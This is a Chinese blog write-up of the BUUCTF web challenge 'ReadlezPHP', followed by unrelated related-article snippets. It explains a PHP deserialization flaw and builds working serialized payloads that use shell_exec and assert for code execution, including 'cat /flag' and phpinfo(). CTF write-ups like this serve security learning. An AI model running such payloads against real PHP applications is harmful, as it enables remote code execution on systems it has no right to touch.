当前位置: 首页 > article >正文

【BUUCTF】【WEB】ReadlezPHP

article 2026/5/19 3:36:18
考点打开题目发现页面有点阴森右键没有任何反应那就右上角三个点更多工具-开发者工具OK没有任何线索那就用bp看看。拉倒最下面发现右下角一个文件./time.php?source这可能是一个线索把它放到题目链接后面发现了源码分析一下源码?php #error_reporting(0); // 注释掉错误报告隐藏PHP错误信息增加漏洞利用的隐蔽性 // 定义HelloPhp类 class HelloPhp { public $a; // 公共属性a可被序列化控制 public $b; // 公共属性b可被序列化控制 // 构造函数**仅在正常实例化对象时自动调用**反序列化时不会执行 public function __construct(){ $this-a Y-m-d h:i:s; // 默认赋值为日期格式字符串 $this-b date; // 默认赋值为PHP内置日期函数名 } // 析构函数**对象被销毁时自动调用**脚本执行结束、unset对象等 // 这是漏洞利用的核心触发点 public function __destruct(){ $a $this-a; $b $this-b; echo $b($a); // 【致命危险点】可变函数调用将$b的值作为函数名$a作为参数执行 } } $c new HelloPhp; // 正常实例化会输出当前时间date(Y-m-d h:i:s) // 查看源代码功能传入?source参数即可看到当前文件的完整代码 if(isset($_GET[source])) { highlight_file(__FILE__); die(0); //只要传了source参数脚本会在这里直接终止 } // 【漏洞入口】直接反序列化用户通过GET参数data传入的字符串 // 符号抑制反序列化错误避免暴露漏洞细节 $ppp unserialize($_GET[data]); ?思路攻击者可以通过data参数完全控制反序列化的内容反序列化会恢复一个HelloPhp对象其$a和$b属性完全由攻击者指定脚本执行结束时会自动调用该对象的__destruct()方法方法中的$b($a)是可变函数调用相当于执行任意函数(任意参数)从而实现远程代码执行因此可构造出序列化payload?php class HelloPhp{ public $a cat /flag; // Linux系统查看目录 public $b shell_exec; //将命令输出作为字符串返回 } echo serialize(new HelloPhp); ?O:8:HelloPhp:2:{s:1:a;s:9:cat /flag;s:1:b;s:10:shell_exec;}发现源码中是要将data进行GET传参所以——注意要把source参数去掉不然脚本就没了发现什么都没有可能是shell_exec被过滤了看一下phpinfo()。?php class HelloPhp{ public $a phpinfo(); public $b assert; } echo serialize(new HelloPhp); ?assert()是 PHP 中一个极其危险但在 CTF 中极其常用的函数它的核心能力是将传入的字符串参数当作合法的 PHP 代码直接执行。// 这两行代码效果完全相同 assert(phpinfo();); eval(phpinfo(););O:8:HelloPhp:2:{s:1:a;s:9:phpinfo();s:1:b;s:6:assert;}ctrlF查找一下shell_exec果然被过滤了那就直接查找flag也是找到了哈

相关文章:

【BUUCTF】【WEB】ReadlezPHP

考点:打开题目,发现页面有点阴森:右键没有任何反应,那就右上角三个点:更多工具->开发者工具OK没有任何线索,那就用bp看看。拉倒最下面,发现右下角一个文件./time.php?source这可能是一个线索…...

编程日记 2026/5/19 3:36:18

从码农到技术总监:10年程序员的职业进化史

一、初入职场:在代码与bug中蹒跚学步2016年的夏天,我背着双肩包,攥着毕业证,走进了一家中型软件公司的大门,成为了一名Java开发程序员,也就是别人口中的“码农”。那时候,我的生活被代码和bug填…...

编程日记 2026/5/19 3:36:15

多智能体时代,Workflow 为什么开始失效?

子玥酱 (掘金 / 知乎 / CSDN / 简书 同名) 大家好,我是 子玥酱,一名长期深耕在一线的前端程序媛 👩‍💻。曾就职于多家知名互联网大厂,目前在某国企负责前端软件研发相关工作,主要聚…...

编程日记 2026/5/19 3:36:11

选择智能体框架:LangChain、AutoGen、CrewAI、Dify对比

去年秋天,我们团队准备上一个新项目,一个可以为客户自动生成月度运营分析报告的智能体。需求不复杂,就是每周从数据库里拉点数据,跑一下趋势分析,最后产出一个带图表和结论的PDF。 我那时候刚花了三个月时间把LangCha…...

编程日记 2026/5/19 3:36:10

别让你的AI模型‘偏心’:用Python实战解决机器学习公平性问题(附代码)

别让你的AI模型‘偏心’:用Python实战解决机器学习公平性问题(附代码) 在信贷审批系统中,女性申请者的通过率比男性低23%;在招聘算法中,35岁以上候选人的简历筛选通过率骤降40%——这些真实案例揭示了一个残…...

编程日记 2026/5/19 3:36:00

防火门禁用行为管控及消防实用管理细则

第一章 总则第一条 制定目的为严格规范防火门日常使用、巡查、维护、管控工作,杜绝违规封堵、常开、损坏、挪用等禁用行为,落实消防安全主体责任,保障疏散通道、安全出口畅通,防范火灾蔓延扩散,依据《建筑设计防火规范…...

编程日记 2026/5/19 3:33:59

NotebookLM能源知识图谱构建全链路(从PDF文献到可推理决策引擎)

更多请点击: https://kaifayun.com 第一章:NotebookLM能源知识图谱构建全链路(从PDF文献到可推理决策引擎) NotebookLM 作为 Google 推出的面向研究者的 AI 原生笔记工具,其核心能力在于对用户上传文档进行语义理解与…...

编程日记 2026/5/19 3:33:59

NotebookLM审稿回复效率提升300%:用结构化Prompt工程重构Response框架(含可直接导入的Notion模板)

更多请点击: https://intelliparadigm.com 第一章:NotebookLM审稿意见回复的范式变革 从线性批注到语义驱动的协同迭代 NotebookLM 不再将审稿意见视为静态文本批注,而是将其作为结构化知识图谱的输入节点。当用户上传论文 PDF 与审稿人意见…...

编程日记 2026/5/19 3:33:59

别再手动算q值了!用Excel地理探测器软件包,5分钟搞定空间分异分析

别再手动算q值了!用Excel地理探测器软件包,5分钟搞定空间分异分析 地理空间数据分析中,识别变量间的分异特征和驱动因子一直是研究难点。传统方法依赖复杂公式推导和编程实现,让许多研究者望而却步。而地理探测器(Geod…...

编程日记 2026/5/19 3:33:59

本地部署dify的Excel提取器出现以下问题:Error extracting from Excel workbook: Request URL is missing an ‘http://’ or

本地部署dify的Excel提取器出现以下问题:An error occurred in the samanhappy/excel_process/excel_process, please contact the author of samanhappy/excel_process/excel_process for help, error type: Exception, error details: Error extracting from Exce…...

编程日记 2026/5/19 3:33:56

深度可分离CNN量化优化:PROM方法解析

1. 深度可分离CNN量化现状与挑战 在移动端和边缘计算场景中,卷积神经网络(CNN)的部署面临两大核心矛盾:模型精度与计算资源之间的权衡,以及理论计算量与实际硬件效率的差距。传统量化方法通常采用"一刀切"策略,对所有卷…...

编程日记 2026/5/19 3:31:56

Spring AI + Ollama 深度实战:从 RAG 问答到 Graph Agent 全流程指南

场景 Spring AI RAG 检索增强生成:概念、实战与完整代码: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/161055108 基于上面的基础,实现Graph工作流编排的简单示例。 大语言模型(LLM)在实际应用中面…...

编程日记 2026/5/19 3:31:56

基于MCP协议为Gemini模型构建安全可控的外部工具链

1. 项目概述:当MCP遇上Gemini,一个AI代理的“瑞士军刀”诞生了如果你最近在折腾AI Agent(智能体)或者RAG(检索增强生成)应用,大概率听说过“Model Context Protocol”,也就是MCP。简…...

编程日记 2026/5/19 3:31:56

别被“逻辑“吓退了,入门级数字化认证根本不需要你是学霸

很多人一听到“数字化认证”“AI考试”“逻辑题”,脑子里立刻浮现两种画面:一种是数学特别强的人在刷题,另一种是自己看不懂专业词,直接劝退。可真到企业实习、岗位转型、项目落地时你会发现,职场需要的往往不是“学霸…...

编程日记 2026/5/19 3:31:56

Sora-FullStack全栈开发框架:构建AI视频生成应用的工程实践

1. 项目概述:一个全栈式Sora应用开发框架的诞生最近在AI视频生成领域,Sora的横空出世无疑点燃了无数开发者和创业者的热情。但兴奋过后,一个现实问题摆在眼前:如何将Sora这类前沿模型的能力,真正落地成一个稳定、可用、…...

编程日记 2026/5/19 3:31:56

实测对比:百度OCR车牌识别在夜间、侧拍、模糊场景下的效果到底怎么样?

百度OCR车牌识别实战评测:夜间、侧拍与模糊场景下的真实表现 当停车场道闸自动抬起,交通卡口违章记录自动生成,这些看似简单的场景背后都依赖一项关键技术——车牌识别。作为计算机视觉领域的经典应用,车牌识别技术已经从实验室走…...

编程日记 2026/5/19 3:29:55

Java OCR实战:精准提取与解析身份证信息

1. 为什么选择Java OCR处理身份证信息? 在企业级应用开发中,身份证信息录入是个高频需求场景。传统人工录入不仅效率低下,还容易出错。我去年参与过一个政务系统改造项目,工作人员每天要处理300张身份证照片,手动录入的…...

编程日记 2026/5/19 3:29:55

中美Agent生态的路径差异——《重构与崛起——OpenClaw时代的中国Agent产业生态报告》解读三

易观分析:面对OpenClaw掀起的全球AI Agent技术浪潮,中美两国走出截然不同的发展路径。美国生态追求底层框架与协议的原创定义;而中国生态以应用驱动、平台绑定和合规先行为核心逻辑,快速将前沿技术转化为可落地的商业现实。这两条…...

编程日记 2026/5/19 3:29:55

Linux依赖冲突回溯生产排障流程

Linux依赖冲突回溯生产排障流程这是一篇面向中级 Linux 使用者的技术文章,主题聚焦在依赖冲突回溯,重点讨论库版本关系、安装失败和升级影响。在真实生产环境中,依赖冲突回溯相关问题往往不会以单一错误形式出现,而是混杂在日志、…...

编程日记 2026/5/19 3:29:55

SKNet核心机制解析与PyTorch实战:从Split-Fuse-Select到完整网络构建

1. SKNet核心机制解析:从Split-Fuse-Select到多尺度特征融合 SKNet(Selective Kernel Networks)是CVPR 2019提出的创新性网络结构,它在传统卷积神经网络的基础上引入了动态选择机制。这个机制的核心在于让网络能够自适应地选择不同…...

编程日记 2026/5/19 3:29:48

NotebookLM智能摘要失效真相(92%用户正在误用的3类文档结构)

更多请点击: https://intelliparadigm.com 第一章:NotebookLM智能摘要失效的底层归因 NotebookLM 的智能摘要功能在部分场景下出现静默失效(即无报错但输出空摘要或重复原文),其根本原因并非模型能力退化,…...

编程日记 2026/5/19 3:27:48

OpenClaw Zero Token 实测:不用 API Key,也能免费聚合多家 AI 模型

OpenClaw Zero Token 实测:不用 API Key,也能免费聚合多家 AI 模型 如果你经常在 Claude、ChatGPT、Gemini、DeepSeek、豆包、Kimi、Grok、通义千问之间来回切换,大概率会遇到一个问题: 每个平台都有自己的网页入口,…...

编程日记 2026/5/19 3:27:48

从家庭网络到公网:一次完整的HTTP请求,在Wireshark中看清NAT的“魔术”

从家庭网络到公网:一次完整的HTTP请求,在Wireshark中看清NAT的“魔术” 清晨的阳光透过窗帘洒在书桌上,你像往常一样打开笔记本电脑,在浏览器地址栏输入"www.baidu.com"并按下回车。这个看似简单的动作背后&#xff0c…...

编程日记 2026/5/19 3:27:47

【NotebookLM提示工程黄金标准】:基于137个真实项目验证的4类任务Prompt评分矩阵

更多请点击: https://intelliparadigm.com 第一章:NotebookLM提示工程研究 NotebookLM 是 Google 推出的基于用户自有文档进行深度理解与对话的 AI 工具,其核心能力高度依赖高质量的提示(Prompt)设计。与通用大模型不…...

编程日记 2026/5/19 3:27:47

从沙子到车辙(1.5):从图灵机到 ECU

1.5 从图灵机到 ECU 一座恶魔般的机房 1945 年,费城,宾夕法尼亚大学摩尔工程学院。 一座 30 吨重的巨兽蹲在一间约 167 平方米的机房里。它的名字叫 ENIAC(Electronic Numerical Integrator and Computer)——世界上第一台通用…...

编程日记 2026/5/19 3:27:47

解放Windows潜能:APK安装器让安卓应用在电脑上完美运行

解放Windows潜能:APK安装器让安卓应用在电脑上完美运行 【免费下载链接】APK-Installer An Android Application Installer for Windows 项目地址: https://gitcode.com/GitHub_Trending/ap/APK-Installer 你是否曾梦想过在Windows电脑上直接运行手机应用&am…...

编程日记 2026/5/19 3:25:46

氯气,氯水,液溴,溴水,溴的四氯化碳溶液,碘单质,碘水的颜色分别是什么?

一、氯气(Cl₂)及其溶液物质颜色备注氯气(气体)黄绿色常温下为有刺激性气味的气体氯水(水溶液)淡黄绿色因溶解少量氯气分子(Cl₂)所致;久置后因生成HClO和HCl&#xff0c…...

编程日记 2026/5/19 3:25:46

NotebookLM新闻传播研究落地全图谱(2024最新实证报告)

更多请点击: https://kaifayun.com 第一章:NotebookLM新闻传播研究的范式演进与学科定位 NotebookLM 作为 Google 推出的面向研究者的 AI 助手,其核心设计理念——以用户上传文档为知识锚点、通过引用溯源生成可信响应——正悄然重构新闻传播…...

编程日记 2026/5/19 3:25:46

Windows窗口置顶终极解决方案:如何用AlwaysOnTop提升300%工作效率

Windows窗口置顶终极解决方案:如何用AlwaysOnTop提升300%工作效率 【免费下载链接】AlwaysOnTop Make a Windows application always run on top 项目地址: https://gitcode.com/gh_mirrors/al/AlwaysOnTop 你是否因频繁切换窗口而打断工作流?是否…...

编程日记 2026/5/19 3:25:46

告别点点点!用Ranorex Studio录制你的第一个计算器自动化测试(附详细截图)

从零开始:用Ranorex Studio实现计算器自动化测试的完整指南 第一次接触自动化测试时,那种既期待又忐忑的心情我至今记忆犹新。作为一位长期被重复性手工测试困扰的QA工程师,每天面对相同的测试用例,点击相同的按钮,验证…...

编程日记 2026/5/19 3:25:44